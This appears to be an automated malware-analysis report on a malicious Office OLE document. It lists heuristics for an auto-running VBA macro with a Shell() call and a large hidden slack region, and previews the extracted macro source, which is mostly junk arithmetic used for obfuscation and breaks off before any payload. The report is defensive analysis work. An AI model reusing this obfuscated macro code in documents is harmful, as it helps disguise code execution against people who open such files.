MALICIOUS
162
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The sample is a malicious OLE document containing a VBA macro. The macro is designed to execute arbitrary code using the Shell() function, which is a critical finding. The presence of a Document_Open macro suggests it executes automatically upon opening. No specific malware family could be identified, and the macro code is heavily obfuscated, limiting further analysis of its exact payload.
Heuristics 5
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALYOLE file is 193,792 bytes but its declared streams total only 52,559 bytes — 141,233 bytes (73%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 40911 bytes |
SHA-256: 724de9c4a46eee3cdfc9a378fc315ce7b77c571bc5cfab5adf81d26454da0b2d |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "nlHwEhwJ" Private Function aVVKQdabdFCiT() On Error Resume Next NXUMOs = 64029 * ckNrlz / 33588 * UtvPi * 63904 * OZwms GoSSb = 90138 * aHHzXw / 93519 * wolLm * 17678 * hmcXv IStKr = 19606 * wzwtjs / 50459 * mpcLj * 65615 * XwEfLG fqDzD = 38542 * IbOPDR / 63177 * nDzup * 54681 * RjUSA LzVIh = 86125 * RawIn / 28065 * EiKoa * 54420 * rZuAH End Function Private Function lzcnDMVi() On Error Resume Next VBXwYH = (71192 - wpNVu / lowlcN * 55528 + (aTzCpA + mLjRh / 97657 / DhNLYO * 76025 * vPCrC)) hpkqz = (74058 - wJkTm / ZFOzd * 34174 + (VQWwD + hHJZMS / 17790 / NJdjSS * 3914 * opMbjf)) RLpEGi = (573 - pQqvH / LWUlAp * 4296 + (rkchk + fWAuRp / 12962 / KtsQW * 26194 * wlOHVZ)) kGFFo = (51652 - wWSku / ddDNm * 92286 + (PXQpOt + Ykzww / 88811 / bdMcK * 28372 * lrtoU)) CUmbR = (38629 - cZtWi / PwdRY * 74678 + (atjSo + uzNZP / 8838 / zwZfO * 78878 * FQTXA)) UtiHz = (32323 - mnOEB / kXAdNM * 91917 + (PKzVVc + mbzCHH / 10700 / kBswr * 82823 * ENALES)) End Function Private Function wMZmqkj() On Error Resume Next qXQMK = (60862 - KlUcMa / XhphRR * 81354 + (imYhPt + QbTYoz / 58946 / njmCNU * 85295 * tXNBFB)) FaBfps = (93060 - Wqjpi / wlMRUw * 98225 + (XWfvGz + WHGbRa / 69618 / dEWBEJ * 61090 * iLbjNv)) JGwBl = (31435 - iHfITO / cGVEuN * 5037 + (uDwHz + UmUZXn / 65762 / QWTckN * 55815 * qjITU)) fQCti = (76791 - QnQVtI / lzswCB * 58342 + (cTlzi + BroPY / 8451 / YwkEzD * 43914 * wwziF)) aKYLBL = (92068 - dQHOV / jwaNu * 81568 + (kRcoiV + OzfKc / 17076 / OwbjWU * 36912 * LczHOG)) oiZCfA = (88639 - whAjdN / KMLiM * 96755 + (uXslBk + TbbKTm / 67111 / hvdKj * 9493 * JwIQz)) End Function Private Function IZwzljvIkuZ() On Error Resume Next wZWLZ = 56012 * rBMGib / 47752 * flTbi * 358 * pHTvi joXjz = 27753 * qCifbS / 63031 * LAUvp * 4858 * zqSiYF uzmMrw = 59051 * Khdrj / 90647 * zcRAl * 36724 * QQYRS PAPjwV = 19525 * HbrnjG / 25084 * SJLadw * 52371 * NHpjPr ahPwss = 73805 * AwTfH / 32008 * VjOSqp * 14662 * rsfdjV End Function Private Function MknsoBK() On Error Resume Next JHdGZZ = (17899 - iJfQFC / rXNvc * 70630 + (OzZOZf + uzWAdA / 53514 / QkXwpT * 12292 * mGiZAR)) MuSvnq = (97705 - CBIbjG / GUKPI * 60899 + (QtQqI + OVzvh / 81624 / oROjP * 33165 * YJuKJ)) mkKJrn = (36243 - lRuDI / oGzCh * 24843 + (ESWEA + njMhQ / 55049 / UISBP * 90453 * ZzjpVP)) ROXtd = (63774 - zdhjK / PcBmQ * 12272 + (YivSIL + HrGtdL / 13101 / PdizjZ * 45794 * HjviW)) Tmtdp = (55544 - ZzhXZZ / wWfGJ * 10096 + (PaXvWu + XclzR / 78381 / whSkP * 38590 * admTJS)) dwcpR = (15358 - SoFqii / Ykdaw * 5035 + (nzmmQz + mhjkK / 39097 / QEbKD * 73475 * iwYQRD)) SvGnQQ = (19757 - Yfzhzb / CMtplh * 77838 + (dArQc + zFjka / 92156 / sHQaLK * 86469 * iiTnrH)) End Function Private Function dPtVTCpFADacw(nNAKEJKvZ) On Error Resume Next QEiil = (57488 - lzLOCt / iEPbUQ * 8749 + (TGmUKY + ZicjD / 83694 / kCQOH * 11040 * kpLHiZ)) BDzVk = (54043 - QTQWZj / TqodUN * 22696 + (IwDiR + NfwBdI / 51225 / DVRIFz * 90494 * jRDDrQ)) tjJwuA = (35378 - KVCoR / wYLnm * 36854 + (MHMKQ + miNjw / 79652 / Itzil * 6089 * PzkwG)) frEiW = (69862 - czldlj / zmFwP * 24796 + (ZjBjP + OWPEqB / 33991 / WiSSRa * 33452 * tHSXs)) End Function Private Function IKBRGKDuGnSFh() On Error Resume Next jOXbHn = (61895 - llXnuR / EOYZvj * 279 + (sLaXL + ILTMUi / 16462 / ZqDbM * 29441 * jXJdOj)) tSHoaw = (56868 - wsbBNa / qXfYm * 46525 + (CjQjT + CRPwRG / 21540 / mVOjN * 52792 * ZdRmv)) izNAnR = (72493 - tVcPUX / YvszL * 69393 + (ujXhMc + OirhzT / 91791 / iXKcAA * 37181 * tTkTNK)) IlGjOf = (30461 - PUTdZD / Zikjph * 41373 + (UkUJn + uzvEi / 21427 / OwupJJ * 77408 * slFfw)) XKoEhc = (11443 - Jzirk / VDchRU * 79359 + (jpbzdN + IlEruJ / 79430 / qJCRFS * 830 * bwMwj)) oSHEH = (58539 - YYrfd / jcfjHP * 52235 + (CRsYw + cFwzY / 47094 / dwoMwj * 18740 * wXAjw)) End Function Private Function iwjOWPtDkrWKMi() On Error Resume Next jTurE = (87756 - szDJMI / CzIAjk * 72796 + (AHYJiQ + XuLXE / 3007 / VVqlO * 78111 * TGhuJ)) KCGwG = (26792 - b ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.